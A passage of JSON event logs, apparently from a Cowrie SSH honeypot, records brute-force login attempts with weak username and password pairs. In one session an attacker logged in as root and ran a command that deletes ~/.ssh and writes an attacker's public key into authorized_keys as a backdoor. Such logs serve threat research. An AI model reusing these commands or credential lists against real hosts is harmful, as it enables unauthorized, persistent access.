03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:42:34.634834Z","src_ip":"212.227.235.229","session":"5a09a822ca5a"}
{"eventid":"cowrie.login.failed","username":"dev","password":"qwerty","message":"login attempt [dev/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:42:35.675380Z","src_ip":"212.227.235.229","session":"5a09a822ca5a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:36.928652Z","src_ip":"212.227.235.229","session":"5a09a822ca5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60481,"dst_ip":"1.2.3.4","dst_port":22,"session":"c32ee1faeda6","protocol":"ssh","message":"New connection: 212.227.235.229:60481 (1.2.3.4:22) [session: c32ee1faeda6]","sensor":"my-vps","timestamp":"2025-09-09T02:43:29.901104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:43:29.909980Z","src_ip":"212.227.235.229","session":"c32ee1faeda6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:43:30.153885Z","src_ip":"212.227.235.229","session":"c32ee1faeda6"}
{"eventid":"cowrie.login.failed","username":"hasan","password":"hasan","message":"login attempt [hasan/hasan] failed","sensor":"my-vps","timestamp":"2025-09-09T02:43:31.145828Z","src_ip":"212.227.235.229","session":"c32ee1faeda6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36832,"dst_ip":"1.2.3.4","dst_port":22,"session":"27d75a5db3f2","protocol":"ssh","message":"New connection: 212.227.235.229:36832 (1.2.3.4:22) [session: 27d75a5db3f2]","sensor":"my-vps","timestamp":"2025-09-09T02:43:31.656559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:43:31.663738Z","src_ip":"212.227.235.229","session":"27d75a5db3f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:43:32.041264Z","src_ip":"212.227.235.229","session":"27d75a5db3f2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:32.399263Z","src_ip":"212.227.235.229","session":"c32ee1faeda6"}
{"eventid":"cowrie.login.failed","username":"hasan","password":"hasan","message":"login attempt [hasan/hasan] failed","sensor":"my-vps","timestamp":"2025-09-09T02:43:33.568911Z","src_ip":"212.227.235.229","session":"27d75a5db3f2"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:34.949471Z","src_ip":"212.227.235.229","session":"27d75a5db3f2"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11796,"dst_ip":"1.2.3.4","dst_port":22,"session":"43d705ab07de","protocol":"ssh","message":"New connection: 185.152.45.241:11796 (1.2.3.4:22) [session: 43d705ab07de]","sensor":"my-vps","timestamp":"2025-09-09T02:43:34.953326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:43:34.958506Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.014209Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.login.success","username":"root","password":"Aaa222","message":"login attempt [root/Aaa222] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.208555Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:43:35.370174Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.370882Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.371961Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.419147Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:43:35.592443Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.593372Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.639390Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.640410Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11779,"dst_ip":"1.2.3.4","dst_port":22,"session":"b77c329779cd","protocol":"ssh","message":"New connection: 185.152.45.241:11779 (1.2.3.4:22) [session: b77c329779cd]","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.679078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.683733Z","src_ip":"185.152.45.241","session":"b77c329779cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.728769Z","src_ip":"185.152.45.241","session":"b77c329779cd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:43:35.909254Z","src_ip":"185.152.45.241","session":"b77c329779cd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:36.959305Z","src_ip":"185.152.45.241","session":"b77c329779cd"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11797,"dst_ip":"1.2.3.4","dst_port":22,"session":"db8519b780e3","protocol":"ssh","message":"New connection: 185.152.45.241:11797 (1.2.3.4:22) [session: db8519b780e3]","sensor":"my-vps","timestamp":"2025-09-09T02:43:37.003908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:43:37.004779Z","src_ip":"185.152.45.241","session":"db8519b780e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:43:37.048388Z","src_ip":"185.152.45.241","session":"db8519b780e3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:43:37.273980Z","src_ip":"185.152.45.241","session":"db8519b780e3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:37.324178Z","src_ip":"185.152.45.241","session":"43d705ab07de"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:37.325243Z","src_ip":"185.152.45.241","session":"db8519b780e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40256,"dst_ip":"1.2.3.4","dst_port":22,"session":"889f79a9940a","protocol":"ssh","message":"New connection: 212.227.235.229:40256 (1.2.3.4:22) [session: 889f79a9940a]","sensor":"my-vps","timestamp":"2025-09-09T02:43:38.229635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:43:38.231170Z","src_ip":"212.227.235.229","session":"889f79a9940a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:43:38.484084Z","src_ip":"212.227.235.229","session":"889f79a9940a"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"Password1","message":"login attempt [appuser/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:43:39.501674Z","src_ip":"212.227.235.229","session":"889f79a9940a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:43:40.757805Z","src_ip":"212.227.235.229","session":"889f79a9940a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22137,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a479aabb320","protocol":"ssh","message":"New connection: 212.227.235.229:22137 (1.2.3.4:22) [session: 3a479aabb320]","sensor":"my-vps","timestamp":"2025-09-09T02:44:28.290149Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44975,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a881a3796d6","protocol":"ssh","message":"New connection: 212.227.235.229:44975 (1.2.3.4:22) [session: 6a881a3796d6]","sensor":"my-vps","timestamp":"2025-09-09T02:44:36.938483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:44:36.939694Z","src_ip":"212.227.235.229","session":"6a881a3796d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:44:37.191563Z","src_ip":"212.227.235.229","session":"6a881a3796d6"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"abc123","message":"login attempt [sshd/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:44:38.191686Z","src_ip":"212.227.235.229","session":"6a881a3796d6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:39.443536Z","src_ip":"212.227.235.229","session":"6a881a3796d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34570,"dst_ip":"1.2.3.4","dst_port":22,"session":"2295eae1ff32","protocol":"ssh","message":"New connection: 212.227.235.229:34570 (1.2.3.4:22) [session: 2295eae1ff32]","sensor":"my-vps","timestamp":"2025-09-09T02:44:43.297455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:44:43.299310Z","src_ip":"212.227.235.229","session":"2295eae1ff32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:44:43.675822Z","src_ip":"212.227.235.229","session":"2295eae1ff32"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"Password","message":"login attempt [minerstat/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:44:45.236645Z","src_ip":"212.227.235.229","session":"2295eae1ff32"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:46.615178Z","src_ip":"212.227.235.229","session":"2295eae1ff32"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11799,"dst_ip":"1.2.3.4","dst_port":22,"session":"9557dcd5d6fc","protocol":"ssh","message":"New connection: 185.152.45.241:11799 (1.2.3.4:22) [session: 9557dcd5d6fc]","sensor":"my-vps","timestamp":"2025-09-09T02:44:50.704265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:44:50.709429Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":